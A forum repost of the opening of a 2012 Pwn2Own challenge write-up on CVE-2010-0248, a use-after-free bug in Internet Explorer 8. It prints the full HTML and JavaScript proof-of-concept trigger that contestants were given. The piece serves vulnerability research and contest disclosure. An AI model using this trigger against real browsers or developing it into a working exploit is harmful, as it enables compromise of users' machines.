Nytro Posted March 23, 2012 (edited)

Pwn2Own Challenges: Heapsprays are for the 99%
BY PETER VREUGDENHIL, THU 15 MAR 2012

In case you aren't familiar with the Pwn2Own rules this year, we asked people to exploit public bugs... here's one of them. The CVE in question (CVE-2010-0248) is a use-after-free vulnerability in Internet Explorer 8 found by yours truly back in 2010. This specific bug is triggered by the following PoC:

    <html>
    <head>
    <script>
    function Start() {
        var TableClone = document.getElementById('tableid').cloneNode(1);
        var TableCellUrns = TableClone.cells.urns('a');
        //var bla = TableClone.cells.item(1);
        var TableCellUrnsTags = TableCellUrns.tags('a');
        TableClone.outerText = 'a';
        Result = TableClone.cells;
        Result = TableCellUrnsTags.item(-1);
    }
    </script>
    </head>
    <body onLoad="window.setTimeout(Start,100);" id="bodyid">
    <table id="tableid">
        <tr><th id="thid"></th></tr>
        <tr id="trid"><td id="tdid"></td></tr>
    </table>
    </body>
    </html>

Download here

This is also the trigger that we handed out to the contestants at Pwn2Own for the CVE challenges. So if you want to try it out yourself you should probably stop reading right now and just start playing around with it.

Full article: http://dvlabs.tippingpoint.com/blog/2012/03/15/pwn2own-2012-challenge-writeup

Edited March 23, 2012 by Nytro